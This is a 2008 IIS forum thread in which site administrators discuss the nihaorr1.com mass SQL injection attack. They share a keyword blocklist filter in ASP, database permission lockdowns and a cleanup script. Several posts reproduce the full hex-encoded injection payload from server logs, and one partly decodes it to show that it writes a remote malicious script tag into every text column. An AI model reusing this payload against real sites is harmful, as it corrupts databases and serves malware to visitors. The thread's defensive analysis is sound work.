Previous Next

• 04-26-2008, 12:28 PM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 749

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact  steve if they were encoded in hex    DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300    4C00410052004500200040005400200076006100720063006800610072    00280032003500350029002C0040004300200076006100720063006800    610072002800320035003500290020004400450043004C004100520045    0020005400610062006C0065005F00430075......... etc  wouldn't we have to search for something likethat   Most overused word in IT is 'should' as in 'That should work!?!'

• 04-26-2008, 1:30 PM

  In reply to

  steve schofield Joined on 06-10-2002, 4:54 PM MI Posts 2,550

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact The example I provided searches for text in the cs-uri-query IIS log file for the wildcard %CAST%, the percent signs are wild cards on both sides.  People can change the text to be %DECLARE% or variations.  I chose CAST because that seemed to be a common term. Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 04-26-2008, 9:16 PM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 749	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I see. CAST is a common term and is used in this attack. I believe another similiar command CONVERT can be used instead as they have similiar funcationality. So, I believe, it does not have to be CAST. Most overused word in IT is 'should' as in 'That should work!?!'

• 04-26-2008, 9:43 PM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 749

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Also for those of you that want a more detailed explaination the deeper goings on of this attack. See this article. Interesting stuff. http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html and here are more on the attack http://isc.sans.org/diary.html?storyid=4331  http://www.dynamoo.com/blog/2008/04/nihaorr1com-theres-no-such-thing-as.html   Most overused word in IT is 'should' as in 'That should work!?!'

• 04-26-2008, 10:53 PM

  In reply to

  alexhiggins732 Joined on 04-27-2008, 2:24 AM Posts 5

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Hi,  The use of this script at pointing to nihaorr1.com is only the latest method of attack used by this attacker.  This guy has been hacking at a clients web site for a long time and usually does so through various proxy servers.  For those looking for a tool to view IIS log files, check out this program I have written http://www.alexanderhiggins.com/logfileparser.aspx To prevent the attacks I have made done the following: 1) Open notepad and past the following code.  The code will check the request for a sql injection attack, and if it finds one it sends you an email and redirects the request to an error page. <% dim str dim r dim badwords str = request.servervariables("QUERY_STRING") if verify(str) = false or (request.querystring("preview")="true") then  Set myMail=CreateObject("CDO.Message")  myMail.Subject="Sending email with CDO"  myMail.From="youremailaddress@yourdomain.com"  myMail.To="mailto:youremailaddress@yourdomain.com"    Dim body  for each item in request.servervariables   body = body & item & "=" & request.servervariables(item) & vbcrlf  next  'for each item in request.params   'body = body & item & "=" & request.params(item) & vbcrlf  'next  myMail.TextBody="This is a SQL Injection Hack Attempt.  Heres the details.  " & vbcrlf & vbcrlf & body  if request.querystring("preview")="true" then   response.write("<pre>" & myMail.textbody & "</pre>")   set myMail=nothing  else   myMail.Send   set myMail=nothing   response.redirect("urlscripterror.asp")  end if     end if   'response.write(verify(str) &"<BR>")   'response.write(str &"<BR>")   'response.write(request.servervariables.count)   'for each item in request.servervariables   'response.write(item & "=" & request.servervariables(item) & "<BR>")   'next function verify(s)    'convert the querystring to lowercase  s = lcase(s)  ' badwords - a list of disallowed keywords in the url  badwords= "select insert update delete drop -- table alter cast convert exec chr( union"  ' create an array list of each back word  r = split(badwords, " ")    ' loop through the bad words and return false if it is present.  for i =0 to ubound(r)   if instr(s, r(i)) > 0 then            verify = false 'instr(s, r(i))    exit function   end if  next  ' If the badword was not found then set verified to = True  verify=true end function %>   2) Save the file as urlfilter.asp and upload it to your web site root. 3) Include the file by pasting the following codeat the very beginning of your asp pages. Note if your site uses includes you can include it in a single include that is shared by all of your pages. <!-- #include virtual="/urlfilter.aspx" --> From a security perspective, lock down your databases.  Perhaps allow only select permissions for anonymous viewers and have a different sql login and connection string for the backend where database updates are required. My issue with monitoring for EXEC commands is by that point the damage is already done. Further, if the hacker is skilled enough they can comprimise your entire server before you even realize they have attacked using the write sql code.   Here is the email I received when this attack happened, with certain information replaced of course. This is a SQL Injection Hack Attempt.  Heres the details.    ALL_HTTP=HTTP_CONNECTION:keep-alive HTTP_CONTENT_LENGTH:0 HTTP_CONTENT_TYPE:text/html HTTP_ACCEPT:text/html, */* HTTP_HOST:www.domainname.com HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)   ALL_RAW=Connection: keep-alive Content-Length: 0 Content-Type: text/html Accept: text/html, */* Host: www.domainname.com User-Agent: Mozilla/3.0 (compatible; Indy Library)   APPL_MD_PATH=/LM/W3SVC/1206399212/Root APPL_PHYSICAL_PATH=E:\domainname\web\ AUTH_PASSWORD= AUTH_TYPE= AUTH_USER= CERT_COOKIE= CERT_FLAGS= CERT_ISSUER= CERT_KEYSIZE= CERT_SECRETKEYSIZE= CERT_SERIALNUMBER= CERT_SERVER_ISSUER= CERT_SERVER_SUBJECT= CERT_SUBJECT= CONTENT_LENGTH=0 CONTENT_TYPE=text/html GATEWAY_INTERFACE=CGI/1.1 HTTPS=off HTTPS_KEYSIZE= HTTPS_SECRETKEYSIZE= HTTPS_SERVER_ISSUER= HTTPS_SERVER_SUBJECT= INSTANCE_ID=1206399212 INSTANCE_META_PATH=/LM/W3SVC/1206399212 LOCAL_ADDR=xxx.xxx.xxx.xxx LOGON_USER= PATH_INFO=/attackedpage.asp PATH_TRANSLATED=E:\domainname\web\attackedpage.asp QUERY_STRING=date=4/17/2008%2011:05:00%20AM';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- REMOTE_ADDR=219.153.46.28 REMOTE_HOST=219.153.46.28 REMOTE_USER= REQUEST_METHOD=POST SCRIPT_NAME=/lakewood_blueclaws_schedule.asp SERVER_NAME=www.domainname.com SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.0 SERVER_SOFTWARE=Microsoft-IIS/6.0 URL=/attackedpage.asp HTTP_CONNECTION=keep-alive HTTP_CONTENT_LENGTH=0 HTTP_CONTENT_TYPE=text/html HTTP_ACCEPT=text/html, */* HTTP_HOST=www.domainname.com HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library) As you can see the attacker simple sent a malformed URL query, which of course is viewable in my IIS logs.

  Tags: IIS Directory SecurityASPSQLnihaorr1 sql injection aspder clean-upsql injectionnihaorr1.comprevent sql injection

• 04-27-2008, 3:03 AM

  In reply to

  dlsfarcrxr Joined on 04-27-2008, 6:19 AM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I want to preface this comment with the following: I have very minimal experience with IIS and MS SQL. I do, however, have experience with MySQL. This post is not meant as flamebait. racekites: ... passedString(0) = "DECLARE" passedString(1) = "NVARCHAR" passedString(2) = "SET" passedString(3) = "CAST" passedString(4) = "0x" passedString(5) = "(" passedString(6) = ")" passedString(7) = "--" passedString(8) = "@" passedString(9) = ";" passedString(10) = "-" passedString(11) = "SELECT" passedString(12) = "declare" passedString(13) = "set" passedString(14) = "cast" passedString(15) = "nvarchar" ... Unless you are dealing with a database where you know what every single value is going to be, won't this result in false positives? For example, if a user enters a value of "b0x", this will match the "0x" in the list of bad words. Additionally, aren't there many ways to bypass a blacklist such as this (CAST, etc.)? Doesn't MS SQL Server have a method to escape certain characters? When I create a program that uses a MySQL database, I have two functions - EscapeMySQL and UnEscapeMySQL. When I have data from a user, it passes through EscapeMySQL before being stored in the database. When I read a value from the database, it passes through UnEscapeMySQL before being displayed. By escaping certain characters (backslash, quote, double quote, linefeed, carriage return, tab, etc.), I don't have to worry even if "DROP DATABASE" is in a string. -- Dave

• 04-27-2008, 5:22 PM

  In reply to

  fox1977 Joined on 07-18-2007, 7:37 PM Posts 12	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Hi folks, Just a quick question,apologies if it sounds a bit stupid.  Are there any microsoft patches available to prevent this happening (either on SQL or IIS) or should any protective measures be taken at the application level. I've just spend the weekend patching web servers any way! Thanks

• 04-27-2008, 6:19 PM

  In reply to

  alexhiggins732 Joined on 04-27-2008, 2:24 AM Posts 5

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Yes these will send up some false positives  passedString(0) = "DECLARE" passedString(1) = "NVARCHAR" passedString(2) = "SET" passedString(3) = "CAST" passedString(4) = "0x" passedString(5) = "(" passedString(6) = ")" passedString(7) = "--" passedString(8) = "@" passedString(9) = ";" passedString(10) = "-" passedString(11) = "SELECT" passedString(12) = "declare" passedString(13) = "set" passedString(14) = "cast" passedString(15) = "nvarchar" Thats why in my post I have limited that blacklisted words to  badwords= "select insert update delete drop -- table alter cast convert exec chr( union"  Or passedString(0)= "select" passedString(1)= "insert" passedString(2)= "update" passedString(3)= "delete" passedString(4)= "drop" passedString(5)= "--" passedString(6)= "table" passedString(7)= "alter" passedString(8)= "cast" passedString(9)= "convert" passedString(10)= "exec" passedString(11) = "chr(" passedString(12) = "union" Additionally, once a request is filtered, I recieve an email so I can review and check for a false positive and adjust my code accordingly. As far MS SQL having function to prevent this they do, and its called stored procedures.  The Problem is that most old school asp programming uses free text queries which the hackers are taking advantage of here.  If the code where to use stored procedures this wouldn't be an issue.

• 04-28-2008, 2:04 AM

  In reply to

  yogorilla Joined on 04-28-2008, 5:57 AM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks for all the info here guys, we were hit last week and this thread saved me a lot of time.  On the subject of stored procs, I'm not sure that they will automatically solve the problem. I have one simple stored proc called from a form that could still provide a vehicle for executing the malicious code, validating the query or the individual parameters would still appear to be the best thing to do.

• 04-28-2008, 4:17 PM

  In reply to

  naziml Joined on 03-10-2008, 6:25 PM Posts 21	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I have put up a generic ASP SQL validation script on my blog post here. Hope this helps. ------------------------------------------------------  Nazim IIS Security

• 05-03-2008, 6:09 PM

  In reply to

  alexhiggins732 Joined on 04-27-2008, 2:24 AM Posts 5	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact How would stored procedures be vulnerable?  The paramaters are converted to a string and are not executed as t-sql.  Try it out, I think you are confused.

• 05-07-2008, 4:21 AM

  In reply to

  bjornen Joined on 05-07-2008, 8:08 AM Posts 2

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks a lot alexhiggins732  I added this script to the website and it seems to work very well already. Only few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to purue this guy? ALL_HTTP=HTTP_ACCEPT:text/html, */* HTTP_CONNECTION:keep-alive HTTP_HOST:www.mydomain.com HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library) HTTP_CONTENT_LENGTH:0 HTTP_CONTENT_TYPE:text/html   ALL_RAW=Accept: text/html, */* Connection: keep-alive Host: www.mydomain.com User-Agent: Mozilla/3.0 (compatible; Indy Library) Content-Length: 0 Content-Type: text/html   APPL_MD_PATH=/LM/W3SVC/24/Root APPL_PHYSICAL_PATH=E:\www\site\ AUTH_PASSWORD= AUTH_TYPE= AUTH_USER= CERT_COOKIE= CERT_FLAGS= CERT_ISSUER= CERT_KEYSIZE= CERT_SECRETKEYSIZE= CERT_SERIALNUMBER= CERT_SERVER_ISSUER= CERT_SERVER_SUBJECT= CERT_SUBJECT= CONTENT_LENGTH=0 CONTENT_TYPE=text/html GATEWAY_INTERFACE=CGI/1.1 HTTPS=off HTTPS_KEYSIZE= HTTPS_SECRETKEYSIZE= HTTPS_SERVER_ISSUER= HTTPS_SERVER_SUBJECT= INSTANCE_ID=24 INSTANCE_META_PATH=/LM/W3SVC/24 LOCAL_ADDR=0.0.0.0 LOGON_USER= PATH_INFO=/default.asp PATH_TRANSLATED=E:\www\file\default.asp QUERY_STRING=Folder=469&CompanyDirectory=1440&CompanyName=Bon+Bon+Guesthouse';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- REMOTE_ADDR=60.169.3.130 REMOTE_HOST=60.169.3.130 REMOTE_USER= REQUEST_METHOD=POST SCRIPT_NAME=/default.asp SERVER_NAME=www.mydomain.com SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.0 SERVER_SOFTWARE=Microsoft-IIS/5.0 URL=/default.asp HTTP_ACCEPT=text/html, */* HTTP_CONNECTION=keep-alive HTTP_HOST=www.mydomain.com HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library) HTTP_CONTENT_LENGTH=0 HTTP_CONTENT_TYPE=text/html

• 05-07-2008, 4:37 AM

  In reply to

  bjornen Joined on 05-07-2008, 8:08 AM Posts 2	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact By the way. I see he seems to be from China, but I assume this is not his real IP. IP: Country: Region: City: Isp: 60.169.3.130 CHINA - - CHINANET ANHUI PROVINCE NETWORK

• 05-07-2008, 5:25 PM

  In reply to

  greenlit_design Joined on 05-07-2008, 9:16 PM Posts 3

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how i fixed it. 1) First to prevent script from executing or any further issues: deny select on sysobjects to sql_login_of_your_app deny select on syscomments  to ql_login_of_your_app deny select on syscolumns  to ql_login_of_your_app deny select on systypes  to ql_login_of_your_app The script won't even get access to the sys tables anymore (you can add more but these are the minimum). 2) use what the Hacker used. select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) That query tells who what was infected. With a night without sleep and few hours later, here is the script that will go thru all the tables / column and remove that string. Hope this help. Don't hesitate if you have questions. Thanks Use DBname --- (your actual DB infected) go   -- (if needed) drop table tmp_tableInfected create table tmp_tableInfected       (t varchar(100),             c varchar(100),       total int)   -- (if needed) truncate table tmp_tableInfected   Declare @sqlInjectString varchar(200) --- here you specify the sql inject string. They used 2 different ones in our case Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'   DECLARE @T varchar(255), @C varchar(255)   set nocount on   DECLARE Table_Cursor CURSOR FOR select top 10    a.name, b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK') order by a.name, b.name   OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN         --print ('insert into tmp_tableInfected select '''       --+  @T +  ''','''       --+  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['       --+ @C  + '] LIKE ''%'       --+ @sqlInjectString + '%'' having count(*) > 0')         Exec ('insert into tmp_tableInfected select '''       +  @T +  ''','''       +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['       + @C  + '] LIKE ''%'       + @sqlInjectString + '%'' having count(*) > 0')   FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor     --DECLARE @T varchar(255), --@C varchar(255)   DECLARE fixSQLInject_Cursor CURSOR FOR select t,c from tmp_tableInfected   OPEN fixSQLInject_Cursor FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN         Print 'update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')'       --- exec ('update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')')   FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C END CLOSE fixSQLInject_Cursor DEALLOCATE fixSQLInject_Cursor   --select t,c,total from tmp_tableInfected       drop table tmp_tableInfected               powlette: Long story short, it's definitely SQL injection. here's the offending url: orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- decoding that binary data which is cast to a varchar yields this: DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('up